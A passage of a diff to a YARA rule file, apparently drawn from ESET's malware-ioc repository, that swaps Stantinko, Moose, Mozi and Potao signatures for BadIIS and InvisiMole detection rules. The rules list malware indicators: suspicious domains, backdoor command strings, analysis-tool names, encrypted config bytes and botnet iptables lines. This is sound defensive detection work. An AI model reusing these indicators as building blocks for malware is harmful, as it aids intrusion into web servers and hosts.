+		$s17 = "http://qp.008php.c" xor
+		$s18 = "http://qp.nmnsw.c" xor
+		$s19 = "http://sc.300bt.c" xor
+		$s20 = "http://sc.wzrpx.c" xor
+		$s21 = "http://sf2223.c" xor
+		$s22 = "http://sx.cmdxb.c" xor
+		$s23 = "http://sz.ycfhx.c" xor
+		$s24 = "http://xpq.0660sf.c" xor
+		$s25 = "http://xsc.b1174.c" xor
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $s* ) or 3 of ( $x* ) ) ) or ( all of them )
+		ESET_IIS_Native_Module_PRIVATE and any of ( $i* ) and 3 of ( $s* )
 }
-rule ESET_Pds_Plugins : FILE
+rule ESET_IIS_Group10
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "dfa75db5-f21c-5b5e-84ba-3bfdcc3efdcd"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 10 native IIS malware family"
+		author = "ESET Research"
+		id = "31368b38-9128-594d-888d-e97d3edc7a1f"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L102-L130"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L389-L423"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "26bbd380b72fb45206178639d67c8737b9984b140ba1048432949e159946c847"
+		logic_hash = "48701168d7da726222227ef757f1a4005a49c0bf300123319ce03db09445b3ef"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		Author = "Frédéric Vachon"
-		Description = "Stantinko PDS' plugins"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		tags = ""
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "std::_Vector_val<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
-		$s2 = "std::_Vector_val<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
-		$s3 = "std::vector<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
-		$s4 = "std::vector<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
-		$s5 = "CHTTPHeaderManager" fullword ascii
-		$s6 = "CHTTPPostItemManager *" fullword ascii
-		$s7 = "CHTTPHeaderManager *" fullword ascii
-		$s8 = "CHTTPPostItemManager" fullword ascii
-		$s9 = "CHTTPHeader" fullword ascii
-		$s10 = "CHTTPPostItem" fullword ascii
-		$s11 = "std::vector<CCookie *,std::allocator<CCookie *> >" fullword ascii
-		$s12 = "std::_Vector_val<CCookie *,std::allocator<CCookie *> >" fullword ascii
-		$s13 = "CCookieManager *" fullword ascii
+		$s1 = "IIS7.dll"
+		$s2 = "<title>(.*?)title(.*?)>"
+		$s3 = "<meta(.*?)name(.*?)=(.*?)keywords(.*?)>"
+		$s4 = "<meta(.*?)name(.*?)=(.*?)description(.*?)>"
+		$s5 = "js.breakavs.co"
+		$s6 = "&#24494;&#20449;&#32676;&#45;&#36187;&#36710;&#80;&#75;&#49;&#48;&#32676;&#12304;&#36827;&#32676;&#24494;&#20449;&#102;&#117;&#110;&#53;&#55;&#54;&#52;&#52;&#12305;&#95;&#24184;&#36816;&#39134;&#33351;&#95;&#24184;&#36816;&#50;&#56;&#32676;"
+		$s7 = "&#21271;&#20140;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#80;&#75;&#49;&#48;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24494;&#20449;&#32676;&#44;&#80;&#75;&#49;&#48;&#24494;&#20449;&#32676;&#44;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#32676;&#44;"
+		$s8 = "&#21271;&#20140;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;&#32676;&#12304;&#36827;&#32676;&#24494;&#20449;&#21495;&#102;&#117;&#110;&#53;&#55;&#54;&#52;&#52;&#12305;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;&#32676;&#44;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;"
+		$e1 = "Baiduspider"
+		$e2 = "Sosospider"
+		$e3 = "Sogou web spider"
+		$e4 = "360Spider"
+		$e5 = "YisouSpider"
+		$e6 = "sogou.com"
+		$e7 = "soso.com"
+		$e8 = "uc.cn"
+		$e9 = "baidu.com"
+		$e10 = "sm.cn"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $s* ) ) )
+		ESET_IIS_Native_Module_PRIVATE and 2 of ( $e* ) and 3 of ( $s* )
 }
-rule ESET_Stantinko_Pdb
+rule ESET_IIS_Group11
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "24694e53-b89e-5cd3-ad53-e738bbd7d69d"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 11 native IIS malware family"
+		author = "ESET Research"
+		id = "e9dac67a-1675-5198-ad26-d555696844f9"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L132-L148"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L425-L455"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "902c0ee086ce1a8def831d2f30c868165198c6c304faac3a93116a524f8e2fbf"
+		logic_hash = "a67b6b49b5fc2c7f260c06201c59478f5472de63091c510af82d526c410abb0c"
 		score = 75
 		quality = 80
 		tags = ""
-		Author = "Frédéric Vachon"
-		Description = "Stantinko malware family PDB path"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "D:\\work\\service\\service\\" ascii
+		$s1 = "DnsQuery_A"
+		$s2 = "&reurl="
+		$s3 = "&jump=1"
+		$s4 = "JVVRaeof"
+		$s5 = "ncpmg::0"
+		$s6 = "zkpzz0cnnuqwnw0eqo"
+		$s7 = "jvvr<11yyy0cnnuqwnw0eqo130rjrAeofqwv?"
 
 	condition:
-		all of them
+		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
 }
-rule ESET_Stantinko_Droppers : FILE
+rule ESET_IIS_Group12
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "fe2e6987-929a-59e3-a9ec-01a9f55fe589"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 12 native IIS malware family"
+		author = "ESET Research"
+		id = "7278f2df-d18a-5d95-9c21-37906629a7f0"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L150-L170"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L457-L495"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "c56fc85834a3e1bb1c14da37fb509c7de3009bf81d52800fe0093dc489f6deaa"
+		logic_hash = "8da03328e3702aff8ea5de77fc220f326030c31972d27c0bd9b5918dca550aba"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko droppers"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		quality = 78
+		tags = ""
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = {55 8B EC 83 EC 08 53 56 BE 80 F4 45 00 57 81 EE 80 0E 41 00 56 E8 6D 23 00 00 56 8B D8 68 80 0E 41 00 53 89 5D F8 E8 65 73 00 00 8B 0D FC F5 45}
-		$s2 = {7E 5E 7F 8C 08 46 00 00 AB 57 1A BB 91 5C 00 00 FA CC FD 76 90 3A 00 00}
+		$s1 = "C:\\inetpub\\temp\\IIS Temporary Compressed Files\\"
+		$s2 = "F5XFFHttpModule.dll"
+		$s3 = "gtest_redir"
+		$s4 = "\\cmd.exe" nocase
+		$s5 = "iuuq;00"
+		$s6 = "?xhost="
+		$s7 = "&reurl="
+		$s8 = "?jump=1"
+		$s9 = "app|zqb"
+		$s10 = "ifeng|ivc|sogou|so.com|baidu|google|youdao|yahoo|bing|118114|biso|gougou|sooule|360|sm|uc"
+		$s11 = "sogou|so.com|baidu|google|youdao|yahoo|bing|gougou|sooule|360|sm.cn|uc"
+		$s12 = "Hotcss/|Hotjs/"
+		$s13 = "HotImg/|HotPic/"
+		$s14 = "msf connect error !!"
+		$s15 = "download ok !!"
+		$s16 = "download error !! "
+		$s17 = "param error !!"
+		$s18 = "Real Path: "
+		$s19 = "unknown cmd !"
+		$b1 = {15 BD 01 2E [-] 5E 40 08 97 [-] CF 8C BE 30 [-] 28 42 C6 3B}
+		$b2 = {E1 0A DC 39 [-] 49 BA 59 AB [-] BE 56 E0 57 [-] F2 0F 88 3E}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them
+		ESET_IIS_Native_Module_PRIVATE and 5 of them
 }
-
-rule ESET_Stantinko_D3D
+rule ESET_IIS_Group13_Iiserpent
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "6652e55c-96a0-55a7-9941-7f32bbf984e5"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 13 native IIS malware family (IISerpent)"
+		author = "ESET Research"
+		id = "f22dffb1-466f-5a7b-b9aa-de7ba991db1a"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L172-L187"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L497-L523"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "4e8da3f11df15e4aa469db62961ae390c4c4df2a5335eec0bdab19b14cc8343d"
+		logic_hash = "7077b842c53ee1581ad4150cdfaac3502bfc0fbd3b823190ad648e09f36e442d"
 		score = 75
 		quality = 80
 		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko d3dadapter component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$s1 = "/mconfig/lunlian.txt"
+		$s2 = "http://sb.qrfy.ne"
+		$s3 = "folderlinkpath"
+		$s4 = "folderlinkcount"
+		$s5 = "onlymobilespider"
+		$s6 = "redirectreferer"
+		$s7 = "loadSuccessfull : "
+		$s8 = "spider"
+		$s9 = "<a href="
+		$s11 = "?ReloadModuleConfig=1"
+		$s12 = "?DisplayModuleConfig=1"
 
 	condition:
-		pe.exports( "EntryPoint" ) and pe.exports ( "ServiceMain" ) and pe.imports ( "WININET.DLL" , "HttpAddRequestHeadersA" )
+		ESET_IIS_Native_Module_PRIVATE and 5 of them
 }
-rule ESET_Stantinko_Ihctrl32
+rule ESET_IIS_Group14
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "e8ab9f78-f438-5d9b-8407-e6c7e241da2c"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 14 native IIS malware family"
+		author = "ESET Research"
+		id = "c773b09e-9f24-5e75-ba80-4be69af70b06"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L189-L209"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L525-L552"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "1829e08fb2289f738d0e75ad9977169e9a94379da764b1766f23fa47e8bc2543"
+		logic_hash = "ef10a4dfb1a9164533677416a7c9ada715ce10bfc1e5f92b56cf54bd890d4575"
 		score = 75
 		quality = 80
 		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko ihctrl32 component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "ihctrl32.dll"
-		$s2 = "win32_hlp"
-		$s3 = "Ihctrl32Main"
-		$s4 = "I%citi%c%size%s%c%ci%s"
-		$s5 = "Global\\Intel_hctrl32"
+		$i1 = "agent-self: %s"
+		$i2 = "/utf.php?key="
+		$i3 = "/self.php?v="
+		$i4 = "<script type=\"text/javascript\" src=\"//speed.wlaspsd.co"
+		$i5 = "now.asmkpo.co"
+		$s1 = "Baiduspider"
+		$s2 = "360Spider"
+		$s3 = "Sogou"
+		$s4 = "YisouSpider"
+		$s6 = "HTTP_X_FORWARDED_FOR"
 
 	condition:
-		2 of them
+		ESET_IIS_Native_Module_PRIVATE and 2 of ( $i* ) or 5 of them
 }
-rule ESET_Stantinko_Wsaudio
+rule ESET_Apt_Windows_Invisimole_Logs : FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "623f4ac7-03ec-52df-b7bf-0a2055453c52"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects log files with collected created by InvisiMole's RC2CL backdoor"
+		author = "ESET Research"
+		id = "151883ad-1f44-55b4-b12a-f0d399527189"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L211-L233"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L54-L77"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "45d92f1475f316ba50a9a4a3dd519d1186ed16c68bd2debe326736a1e3154562"
+		logic_hash = "d42423ccc768f1823c76d5cb2aec26434c796fc35bd4e2fbf435fcf7997d3ff0"
 		score = 75
 		quality = 80
-		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko wsaudio component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s1 = "GetInterface"
-		$s2 = "wsaudio.dll"
-		$s3 = "Global\\Wsaudio_Initialize"
-		$s4 = "SOFTWARE\\Classes\\%s.FieldListCtrl.1\\"
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	condition:
-		2 of them
+		uint32( 0 ) == 0x08F1CAA1 or uint32( 0 ) == 0x08F1CAA2 or uint32( 0 ) == 0x08F1CCC0 or uint32( 0 ) == 0x08F2AFC0 or uint32( 0 ) == 0x083AE4DF or uint32( 0 ) == 0x18F2CBB1 or uint32( 0 ) == 0x1900ABBA or uint32( 0 ) == 0x24F2CEA1 or uint32( 0 ) == 0xDA012193 or uint32( 0 ) == 0xDA018993 or uint32( 0 ) == 0xDA018995 or uint32( 0 ) == 0xDD018991
 }
-rule ESET_Stantinko_Ghstore
+rule ESET_Apt_Windows_Invisimole_SFX_Dropper : FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "ef9f0c27-35ea-5dd5-925f-09b6e043569d"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects trojanized InvisiMole files: patched RAR SFX droppers with added InvisiMole blobs (config encrypted XOR 2A at the end of a file)"
+		author = "ESET Research"
+		id = "08490bcd-3139-5fac-9c6c-5a32acb7217a"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L235-L255"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L79-L95"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "e5628d6ffb2d3684264b3a88c4d7b5d2ce8983aa22badf5839ccb8ba2e3ef2d4"
+		logic_hash = "6ca248d42c1e889988e5931d80df071cb20e623fb0c4a208044cabe073f71ce4"
 		score = 75
 		quality = 80
-		tags = ""
-		Author = "Marc-Etienne M.Léveillé"
-		Description = "Stantinko ghstore component"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "G%cost%sSt%c%s%s%ce%sr" wide
-		$s2 = "%cho%ct%sS%sa%c%s%crve%c" wide
-		$s3 = "Par%c%ce%c%c%s" wide
-		$s4 = "S%c%curity%c%s%c%s" wide
-		$s5 = "Sys%c%s%c%c%su%c%s%clS%c%s%serv%s%ces" wide
+		$encrypted_config = {5F 59 4F 58 19 18 04 4E 46 46 2A 5D 59 5A 58 43 44 5E 4C 7D 2A 0F 2A 59 2A 78 2A 4B 2A 58 2A 0E 2A 6F 2A 72 2A 4B 2A 0F 2A 4E 2A 04 2A 0F 2A 4E 2A 76 2A 0F 2A 79 2A 2A 2A 79 42 4F 46 46 6F 52 4F 49 5F 5E 4F 7D 2A 79 42 4F 46 46 19 18 04 4E 46 46 2A 7C 43 58 5E 5F 4B 46 6B 46 46 45 49 2A 66 45 4B 4E 66 43 48 58 4B 58 53 6B}
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5A4D and $encrypted_config
 }
-rule ESET_Moose_1
+rule ESET_Apt_Windows_Invisimole_CPL_Loader : FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "4d228de6-ddbf-57c0-a330-5840c4d40dfc"
-		date = "2015-04-21"
-		modified = "2016-11-01"
+		description = "CPL loader"
+		author = "ESET Research"
+		id = "feff8627-6085-5835-ac1b-d4522245f7db"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/moose/linux-moose.yar#L41-L76"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L97-L118"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "8bedac80a1f754ce56294ba9786b62a002aacd074f756724401efc61def127e6"
+		logic_hash = "cd5c19e14faa7fd3758b30193ccf2bed3692ad29d8216466523ca25d2abcfe88"
 		score = 75
-		quality = 30
-		tags = ""
-		Author = "Thomas Dupuy"
-		Description = "Linux/Moose malware"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		quality = 80
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s0 = "Status: OK"
-		$s1 = "--scrypt"
-		$s2 = "stratum+tcp://"
-		$s3 = "cmd.so"
-		$s4 = "/Challenge"
-		$s7 = "processor"
-		$s9 = "cpu model"
-		$s21 = "password is wrong"
-		$s22 = "password:"
-		$s23 = "uthentication failed"
-		$s24 = "sh"
-		$s25 = "ps"
-		$s26 = "echo -n -e "
-		$s27 = "chmod"
-		$s28 = "elan2"
-		$s29 = "elan3"
-		$s30 = "chmod: not found"
-		$s31 = "cat /proc/cpuinfo"
-		$s32 = "/proc/%s/cmdline"
-		$s33 = "kill %s"
+		$s1 = "WScr%steObject(\"WScr%s.Run(\"::{20d04fe0-3a%s30309d}\\\\::{21EC%sDD-08002B3030%s\", 0);"
+		$s2 = "\\Control.js" wide
+		$s3 = "\\Control Panel.lnk" wide
+		$s4 = "FPC 3.0.4 [2019/04/13] for x86_64 - Win64"
+		$s5 = "FPC 3.0.4 [2019/04/13] for i386 - Win32"
+		$s6 = "imageapplet.dat" wide
+		$s7 = "wkssvmtx"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( 3 of them )
+}
+
+rule ESET_Apt_Windows_Invisimole_Wrapper_DLL
+{
+	meta:
+		description = "Detects InvisiMole wrapper DLL with embedded RC2CL and RC2FM backdoors, by export and resource names"
+		author = "ESET Research"
+		id = "b9609b09-3ef5-5793-a3aa-4692cec367d9"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L120-L138"
+		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
+		logic_hash = "156bc5bc7b0ed5c77a5a15e7799a3077d40150896476a60935cf21a9afe36856"
+		score = 75
+		quality = 80
+		tags = ""
+		license = "BSD 2-Clause"
+		version = "1"
 
 	condition:
-		ESET_Is_Elf_PRIVATE and all of them
+		pe.exports( "GetDataLength" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00C\x00L\x00" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00F\x00M\x00" )
 }
-rule ESET_Moose_2
+rule ESET_Apt_Windows_Invisimole_DNS_Downloader : FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "74372984-dace-5665-a5d0-39b8d1002fa1"
-		date = "2016-10-02"
-		modified = "2016-11-01"
-		reference = "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/moose/linux-moose.yar#L78-L110"
+		description = "InvisiMole DNS downloader"
+		author = "ESET Research"
+		id = "1caa6c8b-3798-556e-835e-885b7f3f4511"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L140-L170"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "3f50d2d81d4c27e44d93804adcf93971017767ed0e020447cdb343931c2fbc43"
+		logic_hash = "88d6ed7ec1331153d19afc18473a4be2b214ad8af29fcf7051a2a8e40e088231"
 		score = 75
 		quality = 80
-		tags = ""
-		Author = "Thomas Dupuy"
-		Description = "Linux/Moose malware active since September 2015"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "Modules are loaded"
-		$s2 = "--scrypt"
-		$s3 = "http://"
-		$s4 = "https://"
-		$s5 = "processor "
-		$s6 = "cpu model "
-		$s7 = "Host: www.challpok.cn"
-		$s8 = "Cookie: PHPSESSID=%s; nhash=%s; chash=%s"
-		$s9 = "fail!"
-		$s10 = "H3lL0WoRlD"
-		$s11 = "crondd"
-		$s12 = "cat /proc/cpuinfo"
-		$s13 = "Set-Cookie: PHPSESSID="
-		$s14 = "Set-Cookie: LP="
-		$s15 = "Set-Cookie: WL="
-		$s16 = "Set-Cookie: CP="
-		$s17 = "Loading modules..."
-		$s18 = "-nobg"
+		$d = "DnsQuery_A"
+		$s1 = "Wireshark-is-running-{9CA78EEA-EA4D-4490-9240-FC01FCEF464B}" xor
+		$s2 = "AddIns\\" ascii wide xor
+		$s3 = "pcornomeex." xor
+		$s4 = "weriahsek.rxe" xor
+		$s5 = "dpmupaceex." xor
+		$s6 = "TCPViewClass" xor
+		$s7 = "PROCMON_WINDOW_CLASS" xor
+		$s8 = "Key%C"
+		$s9 = "AutoEx%C" xor
+		$s10 = "MSO~"
+		$s11 = "MDE~"
+		$s12 = "DNS PLUGIN, Step %d" xor
+		$s13 = "rundll32.exe \"%s\",StartUI"
 
 	condition:
-		ESET_Is_Elf_PRIVATE and 5 of them
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $d and 5 of ( $s* )
 }
-rule ESET_Mozi_Killswitch : FILE
+rule ESET_Apt_Windows_Invisimole_RC2CL_Backdoor : FILE
 {
 	meta:
-		description = "Mozi botnet kill switch"
-		author = "Ivan Besina"
-		id = "e3d34ae0-de06-5ff4-b44b-44d264b6dd29"
-		date = "2023-09-29"
-		modified = "2023-10-31"
+		description = "InvisiMole RC2CL backdoor"
+		author = "ESET Research"
+		id = "0228b8ee-bf03-504e-8cdf-8a1c9a79d54e"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/mozi/mozi.yar#L32-L51"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L172-L213"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "90eaed2f7f5595b145b2678a46ef6179082192215369fa9235024b0ce1574a49"
+		logic_hash = "c38550023515d33eaaf0669cc8b874bcfd09653a07c7edbf72e3344d1cf31541"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$iptables1 = "iptables -I INPUT  -p tcp --destination-port 7547 -j DROP"
-		$iptables2 = "iptables -I OUTPUT -p tcp --sport 30005 -j DROP"
-		$haha = "/haha"
-		$networks = "/usr/networks"
+		$s1 = "RC2CL" wide
+		$s2 = "hp12KsNh92Dwd" wide
+		$s3 = "ZLib package %s: files: %d, total size: %d" wide
+		$s4 = "\\Un4seen" wide
+		$s5 = {9E 01 3A AD}
+		$s6 = "~mrc_" wide
+		$s7 = "~src_" wide
+		$s8 = "~wbc_" wide
+		$s9 = "zdf_" wide
+		$s10 = "~S0PM" wide
+		$s11 = "~A0FM" wide
+		$s12 = "~70Z63\\" wide
+		$s13 = "~E070C" wide
+		$s14 = "~N031E" wide
+		$s15 = "%szdf_%s.data" wide
+		$s16 = "%spicture.crd" wide
+		$s17 = "%s70zf_%s.cab" wide
+		$s18 = "%spreview.crd" wide
+		$s19 = "Value_Bck" wide
+		$s20 = "Value_WSFX_ZC" wide
+		$s21 = "MachineAccessStateData" wide
+		$s22 = "SettingsSR2" wide
 
 	condition:
-		all of them and filesize < 500KB
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and 5 of ( $s* )
 }
-rule ESET_Potao
+rule ESET_Apt_Windows_Invisimole : FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "9c755cb8-9e3f-5118-a8e0-4ded9a075cbd"
-		date = "2015-07-29"
-		modified = "2015-07-30"
+		description = "InvisiMole magic values, keys and strings"
+		author = "ESET Research"
+		id = "4d48996b-9792-57ba-a302-349220323712"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/potao/PotaoNew.yara#L96-L108"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L215-L255"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "c68addb14f7c22cec0c4d58bfffd373b2e3eb5c53a5b65532c84574e073fcbba"
+		logic_hash = "7a2cff9febe77d718089ba4e1a33f3487594588892e418cec685bf22b156fa2b"
 		score = 75
 		quality = 80
-		tags = ""
-		Author = "Anton Cherepanov"
-		Description = "Operation Potao"
-		Contact = "threatintel@eset.com"
-		License = "BSD 2-Clause"
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$s1 = "CryptProtectData"
+		$s2 = "CryptUnprotectData"
+		$s3 = {9E 01 3A AD}
+		$s4 = "GET /getversion2a/%d%.2X%.2X/U%sN HTTP/1.1"
+		$s5 = "PULSAR_LOADER.dll"
+		$check_magic_old_32 = {3? F9 FF D0 DE}
